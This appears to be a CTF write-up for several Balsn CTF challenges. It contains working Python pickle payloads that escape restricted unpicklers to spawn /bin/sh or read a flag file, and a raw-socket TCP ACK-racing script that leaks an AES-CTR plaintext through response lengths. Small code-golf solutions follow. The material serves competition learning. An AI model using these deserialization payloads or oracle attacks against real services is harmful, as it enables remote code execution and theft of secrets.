5a208546900315b4647326c853850133a526b99f935ee6bc9f0cf6ce274925252a90da2dcd7a66af6fe4cd185a7174353be5521bdd9566edc8584512ee8207bc721d595707cab4eb34654ea3b99591c7bcaef54f414f4f414f4f4f 1cb3054fd88dae943fef2f4fe4bcf375ce74a6838d9336232a85d053c56f70b51a07c6fb5c8627ff2777bc950a077a4b36175fa22c0bc0f3c7da65039ba1e518dd1d48e4e546f9e18ecdc1
[...]
5a208546900315b46b3b718e6c0fa67cc1f709517ae50efe1eed0c62d1310378e7744f5e486104857a69d0c08b30d21ed7ae97b2d01b17ee8a1d1e90b2707ed0d74ef3c0569834cf825ac85775f25c2c854c5a4f414f4f414f4f4f 233137e79523246abd35fa1ca21cb0f2cb257663069202e2901d8d804fa2c396c63b57b770ae2da6f4eb617674469d1cc22d30a41201f42616bf13cf3bb351d0d4f2951460bab8646d6119
5a208546900315b40f7f27b532e5940dd1e47b381f8286a60e2eb32b3a94f913436b7634000472458a22422af7414a87e4a445f0f5b4041fc1e55b7f74b808521f8146df137d00a99892a92debcd1f2c6f4a5b4f414f4f414f4f4f 5eac13489c7cdd6ae99417b0f27953a0534a69c836d8bd09b9dd34ed9f2df8392bee6fba1140126a67c83edf4782606c0f898b300563e6e5b56277c0a407277d268435c8432d699eb818ba
5a208546900315b484c09c5e29ce4f4f8209d4bbc96ed42c8abff23cf57023b8b611a41ebc69f59e79a301aa654e7c24a768dae955050b4b7a4efdf23fe99da0806d5b58a60933ae2bbc6a25ff9d11b0179a444f414f4f414f4f4f c7d0425d8f844bd7c5fc59005ca6b56f12e971d32a82004dda88d3ad4766e75ced502149347257ffb0cd8a99bdc39598d2107cbdd35b501257156b095da5f31d
YES!!
--> c7d0425d8f844bd7c5fc59005ca6b56f12e971d32a82004dda88d3ad4766e75ced502149347257ffb0cd8a99bdc39598d2107cbdd35b501257156b095da5f31d

----------------------------------------

Password: Enjoy your flag :)
Balsn{Th3_M0r3__7He_bEtT3r??}

*** Connection closed by remote host ***

pyshv1, pyshv2, pyshv3

aengelke | misc, 572+857+906 points

In this series of challenges, we were given Python (v3) services which deserialize user-provided data using the Python pickle module. As increased difficulty, the scope of modules accessible from the pickle was severely restricted. Overall, I enjoyed solving these challenges a lot.

Python pickles

A pickle is essentially a program for a stack machine, where the last element on the stack at the end is returned as unpickled object. However, the instructions do not provide full access to operations but are limited to operations needed for deserialization. For example, a __setitem__ operation is provided, but not a complementing __getitem__ operation.

Here are some instructions we used for this challenge:

Operation Stack Before Stack After Operation
GLOBAL (c<module>\n<attr>\n) * * <module.attr> Resolve module.attr
NONE (N) * * <None> None
STRING (S"<str>"\n) * * <str> Constant string
POP (0) * <x> * Pops/removes an element from the stack
SETITEM (s) * <dict> <key> <value> * <dict> dict[key]=value
BUILD (b) * <object> <state> * <object> object.__setstate__(state) or (if the object has no __setstate__ method) object.__dict__.update(state)
REDUCE (R) * <callable> <argtuple> * <res> res=callable(*argtuple)
MARK (() * * MARK
TUPLE (t) * MARK <elem1> ... * <t>
DICT (d) * MARK <key1> <val1> ... * <d>
INST (i<module>\n<attr>\n) * MARK <arg1> ... * <d> Creates a new instance of module.attr with the arguments up to the last mark object
PUT (p<index>\n) * <arg> * <arg> Store arg in the memo array at a given index
GET (g<index>\n) * * <val> Fetch val from the memo array at a given index
STOP (.) * <ret> * <ret> Stop and return the top of the stack

A very detailed documentation of the available instructions can be found in the code of the pickletools library and the implementation of the pickle module itself.

pyshv1

In this challenge, a pickle provided from us is unpickled using the following code (slightly adapted for clarity):

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module not in ['sys'] or '.' in name:
            raise KeyError('The pickle is spoilt :(')
        return pickle.Unpickler.find_class(self, module, name)
def loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

This has two implications: (a) we can only access a module with name sys, and (b) we can only access direct attributes of that module.

Fortunately, the sys module has an attribute modules which contains all loaded modules and also allows overwriting these modules. But as pickles provide no GETITEM instruction and we can only access direct attributes of sys, we cannot call simply sys.modules.__getitem__ directly. This was easy to work around, though:

  1. Using SETITEM, do: sys.modules["sys"] = sys.modules. After this, future resolves of a module named sys will now give the previous sys.modules object! However, we keep the sys.modules variable on our stack.
  2. Using REDUCE, do: sys.__getitem__("os") (as sys is now actually sys.modules)
  3. Using SETITEM, update the "sys" entry in sys.modules (still on our stack) to the value from step 2 (the os module)
  4. Using REDUCE, do: sys.system("/bin/sh") (as sys is now actually os)
  5. Profit!

Flag: Balsn{p1Ck1iNg_s0m3_PiCklEs}

csys
modules
S'sys'
csys
modules
sS"sys"
csys
__getitem__
(S"os"
tRs0csys
system
(S"/bin/sh"
tR.

pyshv2

In this challenge, an empty module named structs was added to the folder, and the resolving routine was changed as follows (again adapted for clarity):

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module not in ['structs'] or '.' in name:
            raise KeyError('The pickle is spoilt :(')
        module = __import__(module)
        return getattr(module, name)
def loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

Note that now the built-in function __import__ and getattr are called explicitly. This routine now only allows access to the (empty) structs module. Let’s check the attributes of an empty module:

>>> dir(s)
['__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__']
>>> s.__getattribute__
<method-wrapper '__getattribute__' of module object at 0x7fcb2c89e3b0>
>>> s.__dict__
{'__name__': 'structs', '__doc__': None, ...}

The __builtin__ dict looks very promising: it contains plenty of helpful functions (exec!) and it is writable — overwriting entries in that array changes them everywhere in the program.

The problem, again, is the missing GETITEM instruction (they should really add one!). This time, we work around that limitation using the BUILD instruction, which essentially calls obj.__dict__.update(arg), effectively adding all entries from a given dict as attributes to an object. Fortunately, we have some objects available — we chose structs.__spec__ — and add all built-ins as attributes to that object.

So, we can overwrite __builtins__['__import__'] = structs.__getattribute__. In a subsequent resolve, when __import__('structs') is executed, structs.__getattribute__('structs') will be called, and from there, the getattr will give us an attribute of the returned object. Combined structs.__dict__["structs"] = structs.__spec__, we can achieve that the next resolve of structs.exec will get us the built-in exec function. Tasty.

Flag: Balsn{CD_sP33duP_eVe3y7h1nG__Wh0_c4r3s_Th3_c0dE?}

cstructs
__dict__
S"structs"
cstructs
__spec__
cstructs
__builtins__
bscstructs
__builtins__
S"__import__"
cstructs
__getattribute__
scstructs
exec
(S'print(open("../flag.txt").read())'
tR.

pyshv3

In this challenge, the setting was changed a bit more. The unpickler is now the same as in pyshv1, except that we can access the structs module only:

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module not in ['structs'] or '.' in name:
            raise KeyError('The pickle is spoilt :(')
        return pickle.Unpickler.find_class(self, module, name)
def loads(s):
    return RestrictedUnpickler(io.BytesIO(s)).load()

The structs module now actually contains a class:

class User(object):
    def __init__(self, name, group):
        self.name = name
        self.group = group
        self.isadmin = 0
        self.prompt = ''

And the main file looks (shortened to relevant parts) like this:

key = os.urandom(100)
with open('../flag.txt', 'rb') as f:
    flag = f.read()
flag = bytes(a ^ b for a, b in zip(key, flag))
user_data = codecs.decode(input().encode('ascii'), 'base64')
user = pickle.loads(user_data)
user.privileged = False
user.flag = flag
# ...
if not user.privileged:
    print('flag: Permission denied')
else:
    print(bytes(a ^ b for a, b in zip(user.flag, key)))

At this point the goal becomes clear: create a User object where the privileged attribute cannot be written. In Python this is indeed possible using descriptors, which are used by the @property decorator. When an attribute is set to an instance whose type provides a __set__ method, that method is called instead.

In our case, we only have one available type we can “hijack” — and in fact use for two purposes: as class for the instance to be returned and as descriptor class. The exploit works as follows:

  1. First, we need to make the User a valid descriptor class, for which we need to add a __set__ method taking two arguments. Luckily, the User class takes two parameters, which is perfectly fine to use for that case. So, we set User.__set__ = User using the BUILD instruction. (Detail: as the __dict__ attribute is read-only for some reason, we set this as instance attribute of the object using the slotstate dict which BUILD can take. Refer to the implementation for further information.)
  2. Next, we create an instance of the descriptor class User using the INST instruction and add it as privileged attribute to the class.
  3. Finally we create a new instance of the User and return it. If later on privileged is set, the __set__ method of privileged will be called, but the attribute will not be changed.

Flag: Balsn{pY7h0n1dae_ObJ3c7}

cstructs
User
(N(S"__set__"
cstructs
User
dtbcstructs
User
(N(S"privileged"
(S"q"
S"w"
istructs
User
dtb(S"a"
S"b"
istructs
User
.

john

yyyyyyy | misc, 1000 points

This (totally awesome!!) challenge consisted of a extremely neat combination of a few rather subtle information-leakage vulnerabilities. The task script implements a “secure console”, with which we can only communicate in encrypted form — without ever learning the key, so we are effectively blind.

Let’s first have a look at the full glory of the given task.py:

#!/usr/bin/python3 -u

import sys
import os
import codecs
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend


class SecureConsole(object):
    def __init__(self):
        self.remaining = 40
        aes = algorithms.AES(os.urandom(32))
        mode = modes.CTR(os.urandom(16))
        backend = default_backend()
        self.cipher = Cipher(aes, mode, backend=backend)
        self.encryptor = self.cipher.encryptor()

    def readhexline(self):
        chunk = b''
        while len(chunk) < 81:
            ret = sys.stdin.buffer.read(81 - len(chunk))
            if len(ret) == 0:
                raise EOFError('EOF while readhexline')
            chunk += ret
        assert chunk[-1:] == b'\n', 'newline'
        chunk = codecs.decode(chunk[:-1], 'hex')
        return chunk
        
    def readline(self):
        data = b''
        decryptor = self.cipher.decryptor()
        while not data.endswith(b'\0'):
            chunk = self.readhexline()
            chunk = decryptor.update(chunk)
            data += chunk
        return data.rstrip(b'\0')

    def write(self, data):
        data = data.encode('utf8')
        while len(data):
            chunk = data[:self.remaining]
            ct = self.encryptor.update(chunk)
            ct = codecs.encode(ct, 'hex')
            sys.stdout.buffer.write(ct)
            data = data[len(chunk):]
            self.remaining -= len(chunk)
            if self.remaining == 0:
                sys.stdout.buffer.write(b'\n')
                self.remaining = 40
        return self

    def endl(self):
        ct = self.encryptor.update(b'\0' * self.remaining)
        ct = codecs.encode(ct, 'hex') + b'\n'
        sys.stdout.buffer.write(ct)
        self.remaining = 40
        return self


def main(flag):
    sc = SecureConsole()

    sc.write(flag).endl()
       
    for _ in range(30):
        sc.write('[>] Gimme your flag: ').endl()
        line = sc.readline()

        sc.write('[*] Result: ')

        try:
            line = line.decode('utf8')
            if line == flag:
                sc.write('OK').endl()
            else:
                sc.write('Nope').endl()
        except:
            sc.write('QAQ').endl()


if __name__ == '__main__':
    sys.stderr.close()
    with open('../flag.txt', 'rb') as f:
        flag = f.read()
    flag = codecs.encode(flag, 'hex').decode('utf8')
    assert len(flag) <= 70
    main(flag)

Essentially, the script first dumps the encrypted flag, then proceeds to read input, decrypt it, and compare it against the flag. All server output is padded to multiples of 40 bytes, so the distinct responses "OK", "Nope", and "QAQ" just turn into random garbage of the same length — not very useful as an oracle.

After staring at the challenge script for an extended amount of time, we’d finally accumulated the following set of observations, which can be combined to recover the flag and solve the challenge:

  • The counter for decryption is reset for every *de*cryption (but not encryption), so we can for instance send back the encrypted flag we’ve initially received and get an (unintelligible) "OK" response.
  • More useful is the well-known fact that AES-CTR is linear under XOR, so we can also modify the given flag ciphertext by XORing it with arbitrary differentials.
  • The (still unreadable) oracle returns three different answers: "OK" for a valid flag, "Nope" for an invalid flag, and — notably — "QAQ" when the plaintext is not valid UTF8!
  • Finally, the crucial ingredient, which was hinted to by a link in the challenge description: Although the answers are padded to 40 bytes, the 40-byte chunks are not written out to the socket in one piece. Thus, the idea is to somehow convince the server to immediately send out the ciphertext corresponding to "OK", "Nope", or "QAQ", before endl() is called to fill up the 40-byte chunk. Thus, the length of the TCP segment containing the oracle response will allow us to distinguish between the three possible responses.

These things together imply the following strategy for leaking information about the flag plaintext: XOR well-chosen differentials into the given flag ciphertext and send it back to the server, then make sure the oracle response is sent out immediately to learn the response, and finally infer some knowledge about the flag from the leakage whether the decrypted manipulated plaintext was valid UTF8 or not.


To illustrate the idea, let’s suppose that the flag is either the string "hello" or "h3llo", and we XOR the bytes 00 80 c0 c0 00 into the flag ciphertext. Then "hello" turns into the string b"h\xe5\xac\xaco", which is a valid UTF8 encoding for the Unicode string “h嬬o”, and "h3llo" turns into "h\xb3\xac\xaco", which is invalid UTF8 as the \xb3 is a standalone continuation byte. Thus, we can distinguish encryptions of those two strings by simply XORing in certain differentials and learning if the corresponding plaintext is still valid UTF8 or not.

Note that the e vs. 3 example is rather nice: There also exist bytes that simply cannot be distinguished using this technique; for example, the string "dddd" ^ diff is valid UTF8 if and only if the string "eeee" ^ diff is.

However, it turns out that combining a few XOR patterns such as the 80 c0 c0 above is enough to constrain the plaintext bytes to a few choices each, at least in the case that each byte is in fact a hex digit 0123456789abcdef like in the challenge — in that case, the exploit script below obtains at most two guesses per byte, which differ by an XOR of 07.


Let’s now see how we can manipulate the server to send out the (encrypted) oracle response early. Nagle’s algorithm dictates that data written to a TCP stream should be cached until either a full segment of data has been collected, or the receiving side has acknowledged all previously sent data. Clearly, we cannot force the server to fill its send buffer, so we will try to force the second condition. Note that we are now trying to win a race: We need to ACK the string "[*] Response: " sent by the server before it write()s one of the strings "OK", "Nope", or "QAQ" to the kernel. In the script above, the timeframe we are trying to hit is

        sc.write('[*] Result: ')
    
        # >>>> HERE! <<<< #

        try:
            line = line.decode('utf8')
            if line == flag:
                sc.write('OK').endl()
            else:
                sc.write('Nope').endl()
        except:
            sc.write('QAQ').endl()

We quickly realized that standard TCP implementations definitely don’t send the ACK quickly enough, so after a bit of experimentation we decided to write our own not-so-quick-and-extremely-dirty hacked TCP version to simply send out an ACK for the "[*] Result: " string before we’ve even received it.

Even more, rather than trying to hit the target timeframe exactly with a single packet, we made use of the fact that TCP is rather forgiving with respect to duplicate packets — and simply decided to send the ACK a few handfuls of times just to be sure.

Notice that nicely enough, this oracle is perfectly sound: If we fail to win the race, the response segment might be inconclusive, but we will never get a response of e.g. eight bytes when the response was not in fact "Nope".

For example, here are some tcpdump outputs of the server’s response segments captured during the competition, for (1) just sending back the (correct) encrypted flag, (2) sending back a wrong encrypted flag (e.g. XOR with 01), and (3) sending back a ciphertext decrypting to invalid UTF8 (e.g. XOR with 80). Clearly, the different lengths correspond to the distinct server responses, which is exactly what we wanted.

22:19:41.615484 IP 54.90.150.152.5452 > 95.216.166.62.3476: Flags [P.], seq 268:272, ack 163, win 29876, length 4
22:24:46.997693 IP 54.90.150.152.5452 > 95.216.166.62.55130: Flags [P.], seq 268:276, ack 163, win 29876, length 8
22:24:54.612918 IP 54.90.150.152.5452 > 95.216.166.62.26307: Flags [P.], seq 268:274, ack 163, win 29876, length 6

Putting it all together, we used the following (definitely CTF-grade and therefore not to be used in any real-life anything) script to obtain guesses for each of the flag bytes:

#!/usr/bin/env python3
import socket, random, time, sys, atexit, os, struct

lip = '95.216.166.62'   # own ip (ephemeral cloud server, no need to hack :P)
rip = '54.90.150.152'   # john.balsnctf.com

FIN = 1 << 0
SYN = 1 << 1
RST = 1 << 2
PSH = 1 << 3
ACK = 1 << 4

class wtf(Exception): pass

class tcp:

    # super hacky, doesn't implement much of TCP correctly, but it flogs :)

    debug = False

    def __init__(self):
        self.rs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_TCP)
        self.rs.bind((lip,0))
        self.rs.settimeout(1)

    def checksum(self, data, sz):
        pseudo = bytes(map(int,lip.split('.'))) + bytes(map(int,rip.split('.')))
        pseudo += struct.pack('>BBH', 0, 0x6, sz)
        data = pseudo + data
        if len(data)%2: data += b'\0'
        s = 0
        for i in range(0, len(data), 2):
            s += struct.unpack('<H', data[i:i+2])[0]
        s = (s >> 16) + (s & 0xffff)
        s += s >> 16
        return ~s & 0xffff

    def put(self, flags, data = b''):
        header = struct.pack('!HHLLBBHHH', self.src, self.port, self.seq, self.ack, 5 << 4, flags,  self.window, 0, 0)
        chk = self.checksum(header + data, len(header) + len(data))
        header = header[:16] + struct.pack('<H', chk) + header[18:]
        self.rs.sendto(header + data, (self.ip, 0))
        self.seq += 1 if SYN & flags else len(data)

    def get(self):
        t0 = time.time()
        while True:
            if time.time() >= t0 + 1:
                raise socket.timeout('oops')
            data, addr = self.rs.recvfrom(0x1000)
            if addr[0] != self.ip: continue
            if len(data) < 40: continue
            data = data[20:]    # skip IP header, what could go wrong
            header = struct.unpack('!HHLLBBHHH', data[:20])
            src, port, seq, ack, off, flags, window, chksum, urg = header
            off >>= 4
            data = data[4*off:]
            flags = {f for f in {FIN,SYN,RST,PSH,ACK} if f & flags}
            if src == self.port and port == self.src:
                break
        if tcp.debug:
            print('\x1b[34m{} {} {} {} {} {} {} {:#x} {} {}\x1b[0m'.format(src, port, seq, ack, off, flags, window, chksum, urg, data))
        self.ack = seq + 1 if SYN in flags else seq + len(data)
        return flags, data

    def connect(self, addr):
        self.ip, self.port = addr
        self.src = random.randrange(1024,65536)
        self.seq = random.randrange(2**32)
        self.ack = 0
        self.window = 777

        self.put(SYN)

        flags, data = self.get()
        if flags != {SYN,ACK} or data:
            raise wtf('unexpected server response')

        self.put(ACK)

    def recv(self):
        flags, data = self.get()
        return data

    def send(self, data, send_ack = True):
        if tcp.debug: print('\x1b[36m{}\x1b[0m'.format(data))
        self.put(PSH | (ACK if send_ack else 0), data)

    def close(self):
        self.put(FIN)


def oracle(diff):
    # prevent the kernel from killing our connection (only) while we're working
    os.system('iptables -D OUTPUT -p tcp -m tcp --tcp-flags RST RST -j DROP 2>/dev/null')
    time.sleep(1)   #XXX seems like we're rate limited?
    os.system('iptables -A OUTPUT -p tcp -m tcp --tcp-flags RST RST -j DROP')

    sock = tcp()
    try:
        sock.connect((rip, 5452))
    except wtf:
        print('\x1b[31mretrying\x1b[0m', end='\r'); sys.stdout.flush()
        return oracle(diff)

    cipher = b''
    while True:
        cipher += sock.recv()
        if len(cipher) < 81*3:
            sock.put(ACK)
        else:
            break
#    print(cipher)

    cipher = bytes.fromhex(cipher.decode().replace('\n',''))

    assert len(cipher)%40 == 0
    dblks = [diff[i:][:40] for i in range(0,len(diff),40)]
    cblks = [cipher[i:][:40] for i in range(0,len(cipher),40)]
    blks = [bytes(c^d for c,d in zip(cblk,dblk)) for cblk,dblk in zip(cblks,dblks)]
    assert len(blks) == 2
    assert {len(blk) for blk in blks} == {40}

    sock.send(''.join(blk.hex() + '\n' for blk in blks).encode())

    # this is where the magic happens: we immediately ACK the "[*] Result: "
    # prefix to make sure the following ciphertext chunk is sent right away.
    # the length of that segment leaks the plaintext (one of OK/Nope/QAQ).
    sock.ack += 2 * len('[*] Result: ')
    for _ in range(16): # viel hilft viel
        sock.put(ACK)

    t0 = time.time()
    while time.time() < t0 + 1:
        flags, data = sock.get()
        if flags == {PSH,ACK}:
            if len(data) == 8:
                sock.close()
                return True     # valid UTF8, invalid flag
            elif len(data) == 4:
                sock.close()
                raise Exception('was valid flag')
            elif len(data) == 6:
                sock.close()
                return False    # invalid UTF8
    sock.close()

    # something went wrong (didn't leak), let's retry
    print('\x1b[31mretrying\x1b[0m', end='\r'); sys.stdout.flush()
    return oracle(diff)

atexit.register(lambda: os.system('iptables -D OUTPUT -p tcp -m tcp --tcp-flags RST RST -j DROP'))

# valid UTF8 chars; these together uniquely identify hex digits up to ^7.
patterns = [
        [0xf4, 0x81, 0x81, 0x81],
        [0xf3, 0x81, 0x81, 0x81],
        [0xef, 0x81, 0x81, 0x00],
        [0xdf, 0x81, 0x00, 0x00],
    ]

pos = 69    # task script says len(hex_flag) <= 70
known = [[] for _ in range(70)] + [[0] for _ in range(10)]
pos, known[62:70] = 61, [[0]]*8 #XXX learned this on an earlier (failed) attempt
while pos >= 0:
    for guess in b'\0' + (b'0123456789abcdef' if pos%2 else b'234567'):
        if 0 in known[pos]:
            continue
        good = 1
        for pat in patterns:
            diff = [0] * 80
            diff[pos] = guess ^ pat[0]
            for i in range(1,len(pat)):
                diff[pos+i] = pat[i] ^ known[pos+i][0]
            while True:
                try:
                    res = oracle(bytes(diff))
                    break
                except socket.timeout:
                    print('\x1b[31mtimeout\x1b[0m', end='\r'); sys.stdout.flush()
                    time.sleep(3)
            good &= res
            print('{:2} {:02x} ({}) ~> \x1b[36m{}\x1b[0m ~> \x1b[33m{}\x1b[0m'.format(pos, guess, bytes(pat).hex(), int(res), good))
            if not good: break
        if good:
            known[pos].append(guess)
    print('--> {}'.format(','.join('\x1b[32m{}\x1b[0m'.format(''.join(map(chr,k))) for k in known)))
    pos -= 1

Running this script gives something like the following (slowly appearing) output:

61 00 (f4818181) ~> 0 ~> 0
61 30 (f4818181) ~> 0 ~> 0
61 31 (f4818181) ~> 0 ~> 0
61 32 (f4818181) ~> 0 ~> 0
61 33 (f4818181) ~> 0 ~> 0
61 34 (f4818181) ~> 0 ~> 0
61 35 (f4818181) ~> 0 ~> 0
61 36 (f4818181) ~> 0 ~> 0
61 37 (f4818181) ~> 0 ~> 0
61 38 (f4818181) ~> 0 ~> 0
61 39 (f4818181) ~> 0 ~> 0
61 61 (f4818181) ~> 1 ~> 1
61 61 (f3818181) ~> 1 ~> 1
61 61 (ef818100) ~> 1 ~> 1
61 61 (df810000) ~> 1 ~> 1
61 62 (f4818181) ~> 0 ~> 0
61 63 (f4818181) ~> 0 ~> 0
61 64 (f4818181) ~> 1 ~> 1
61 64 (f3818181) ~> 0 ~> 0
61 65 (f4818181) ~> 0 ~> 0
61 66 (f4818181) ~> 1 ~> 1
61 66 (f3818181) ~> 1 ~> 1
61 66 (ef818100) ~> 1 ~> 1
61 66 (df810000) ~> 1 ~> 1
--> ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,af,,,,,,,,,,,,,,,,,,
60 00 (f4818181) ~> 0 ~> 0
60 32 (f4818181) ~> 0 ~> 0
60 33 (f4818181) ~> 0 ~> 0
60 34 (f4818181) ~> 0 ~> 0
60 35 (f4818181) ~> 1 ~> 1
60 35 (f3818181) ~> 0 ~> 0
60 36 (f4818181) ~> 1 ~> 1
60 36 (f3818181) ~> 0 ~> 0
60 37 (f4818181) ~> 1 ~> 1
60 37 (f3818181) ~> 1 ~> 1
60 37 (ef818100) ~> 1 ~> 1
60 37 (df810000) ~> 1 ~> 1
--> ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,7,af,,,,,,,,,,,,,,,,,,
59 00 (f4818181) ~> 0 ~> 0
59 30 (f4818181) ~> 0 ~> 0
59 31 (f4818181) ~> 0 ~> 0
59 32 (f4818181) ~> 0 ~> 0
59 33 (f4818181) ~> 0 ~> 0
59 34 (f4818181) ~> 0 ~> 0
59 35 (f4818181) ~> 0 ~> 0
59 36 (f4818181) ~> 0 ~> 0
59 37 (f4818181) ~> 0 ~> 0
59 38 (f4818181) ~> 0 ~> 0
59 39 (f4818181) ~> 0 ~> 0
59 61 (f4818181) ~> 1 ~> 1
59 61 (f3818181) ~> 0 ~> 0
59 62 (f4818181) ~> 1 ~> 1
59 62 (f3818181) ~> 0 ~> 0
59 63 (f4818181) ~> 1 ~> 1
59 63 (f3818181) ~> 1 ~> 1
59 63 (ef818100) ~> 1 ~> 1
59 63 (df810000) ~> 1 ~> 1
59 64 (f4818181) ~> 1 ~> 1
59 64 (f3818181) ~> 1 ~> 1
59 64 (ef818100) ~> 1 ~> 1
59 64 (df810000) ~> 1 ~> 1
59 65 (f4818181) ~> 0 ~> 0
59 66 (f4818181) ~> 0 ~> 0
--> ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,cd,7,af,,,,,,,,,,,,,,,,,,
58 00 (f4818181) ~> 0 ~> 0
58 32 (f4818181) ~> 1 ~> 1
58 32 (f3818181) ~> 0 ~> 0
58 33 (f4818181) ~> 0 ~> 0
58 34 (f4818181) ~> 0 ~> 0
58 35 (f4818181) ~> 0 ~> 0
58 36 (f4818181) ~> 0 ~> 0
58 37 (f4818181) ~> 1 ~> 1
58 37 (f3818181) ~> 1 ~> 1
58 37 (ef818100) ~> 1 ~> 1
58 37 (df810000) ~> 1 ~> 1
--> ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,7,cd,7,af,,,,,,,,,,,,,,,,,,


[...omitted...]


--> ,,,,,,,34,6,be,7,be,25,25,34,34,6,34,34,34,34,16,34,be,6,07,25,af,25,07,6,9,25,34,6,8,25,af,34,af,34,07,6,8,6,be,25,af,34,be,34,34,6,07,34,16,6,25,7,cd,7,af,,,,,,,,,,,,,,,,,,
 6 00 (f4818181) ~> 0 ~> 0
 6 32 (f4818181) ~> 1 ~> 1
 6 32 (f3818181) ~> 0 ~> 0
 6 33 (f4818181) ~> 0 ~> 0
 6 34 (f4818181) ~> 0 ~> 0
 6 35 (f4818181) ~> 0 ~> 0
 6 36 (f4818181) ~> 0 ~> 0
 6 37 (f4818181) ~> 1 ~> 1
 6 37 (f3818181) ~> 1 ~> 1
 6 37 (ef818100) ~> 1 ~> 1
 6 37 (df810000) ~> 1 ~> 1
--> ,,,,,,7,34,6,be,7,be,25,25,34,34,6,34,34,34,34,16,34,be,6,07,25,af,25,07,6,9,25,34,6,8,25,af,34,af,34,07,6,8,6,be,25,af,34,be,34,34,6,07,34,16,6,25,7,cd,7,af,,,,,,,,,,,,,,,,,,
 5 00 (f4818181) ~> 0 ~> 0
 5 30 (f4818181) ~> 0 ~> 0
 5 31 (f4818181) ~> 0 ~> 0
 5 32 (f4818181) ~> 0 ~> 0
 5 33 (f4818181) ~> 0 ~> 0
 5 34 (f4818181) ~> 0 ~> 0
 5 35 (f4818181) ~> 0 ~> 0
 5 36 (f4818181) ~> 0 ~> 0
 5 37 (f4818181) ~> 0 ~> 0
 5 38 (f4818181) ~> 0 ~> 0
 5 39 (f4818181) ~> 0 ~> 0
 5 61 (f4818181) ~> 0 ~> 0
 5 62 (f4818181) ~> 0 ~> 0
 5 63 (f4818181) ~> 1 ~> 1
 5 63 (f3818181) ~> 1 ~> 1
 5 63 (ef818100) ~> 1 ~> 1
 5 63 (df810000) ~> 1 ~> 1
 5 64 (f4818181) ~> 1 ~> 1
 5 64 (f3818181) ~> 1 ~> 1
 5 64 (ef818100) ~> 1 ~> 1
 5 64 (df810000) ~> 1 ~> 1
 5 65 (f4818181) ~> 1 ~> 1
 5 65 (f3818181) ~> 0 ~> 0
 5 66 (f4818181) ~> 1 ~> 1
 5 66 (f3818181) ~> 0 ~> 0
--> ,,,,,cd,7,34,6,be,7,be,25,25,34,34,6,34,34,34,34,16,34,be,6,07,25,af,25,07,6,9,25,34,6,8,25,af,34,af,34,07,6,8,6,be,25,af,34,be,34,34,6,07,34,16,6,25,7,cd,7,af,,,,,,,,,,,,,,,,,,
 4 00 (f4818181) ~> 0 ~> 0
 4 32 (f4818181) ~> 0 ~> 0
 4 33 (f4818181) ~> 1 ~> 1
 4 33 (f3818181) ~> 0 ~> 0
 4 34 (f4818181) ~> 0 ~> 0
 4 35 (f4818181) ~> 0 ~> 0
 4 36 (f4818181) ~> 1 ~> 1
 4 36 (f3818181) ~> 1 ~> 1
 4 36 (ef818100) ~> 1 ~> 1
 4 36 (df810000) ~> 1 ~> 1
 4 37 (f4818181) ~> 0 ~> 0
--> ,,,,6,cd,7,34,6,be,7,be,25,25,34,34,6,34,34,34,34,16,34,be,6,07,25,af,25,07,6,9,25,34,6,8,25,af,34,af,34,07,6,8,6,be,25,af,34,be,34,34,6,07,34,16,6,25,7,cd,7,af,,,,,,,,,,,,,,,,,,

(Note that we terminated the script at that point because we’d successfully found the flag.)

The important bits are the lines starting with -->: The digits between each comma are the possible flag characters for that position. This still gives about 240 possible flags, but luckily we could identify the correct one by manually looking at substrings and identifying the correct choice as a human-readable leetspeak string.

Thus, finally, without further ado, the flag is:

Balsn{R4c31Ng_WiTh_J0hn_N4g1e}\x7f

(I’m not exactly sure where the \x7f comes from; it seems that it was just part of ../flag.txt.)


listcomp_ppm

iead | PPM, 371 points

In this challenge you had to solve three problems only using Python3 list comprehensions with a limited amount of characters each. Additionally, “ and ‘ were forbidden.

Flag: Balsn{8_8_l13t_c0mp63h3ns10n_0r_A_5en8_80x_ch01l3n93}

Summation of Pairs

After connecting to the service and solving the PoW one was greeted with a text stating the rules and the first problem.

Question: The first line would contain a positive integer N. Then there would be N lines below. Each line contains two integer A and B. Please output the corresponding A+B.
Example Input:
3
1 2
3 4
5 6

Example Output:
3
7
11
Input Length Limit: 75

I took a straight forward approach to this first question. I read the first line via input converted it to an integer. Knowing how many lines follow i read in each of them, convert all numbers on the line to integers, storing them in a list. Then i sum up that list and print the result.

[print(sum(list(map(int,input().split()))))for x in range(int(input()))]

After realizing sum also does work with a map not just a list and having the idea of creating an array of uncalled input functions I golfed my initial solution from 73 down to 62 characters

[print(sum(map(int,x().split())))for x in[input]*int(input())]

Knapsack

After all tests had passed and I was greeted with a Congrats! You pass question 0. I started with the second problem.

Question: This is the knapsack problem that you know. Sasdffan is going to buy some junk foods. However, he has only limited budgets M. Each junk food would have two attributes, the cost of buying the junk food and the value of eating the junk food. The first line contains two positive integers N and M. Then, there would be N lines below. Each line contains two positive integers v and c. (v: value, c: cost). Please output the maximum value that Sasdffan could get after consuming all the junk foods he bought. Caution: Each junk food could only be bought once.
 1000 <= N <= 2000, 1 <= M <= 3000, 1 <= c <= 3000, v > 0
Example Input:
3 5
1 2
1 3
2 2

Example Output:
3
Input Length Limit: 200

Initial solution

This challenge initially gave me lots of trouble as I initially tried to implement a naive algorithm assuming the tight character limit would not allow for a proper knapsack implementation. Not only consuming quite some time getting the first working solution, I also was unable to meet the 200 character requirement.

[print(max([sum(x[::2])for n,m in[tuple(map(int,input().split()))]for d in[[list(map(int,x().split()))for x in[input]*n]]for x in[sum([d for j,d in enumerate(d)if i>>j&1],[])for I in range(2**n)]if sum(x[1::2])<=m]))]

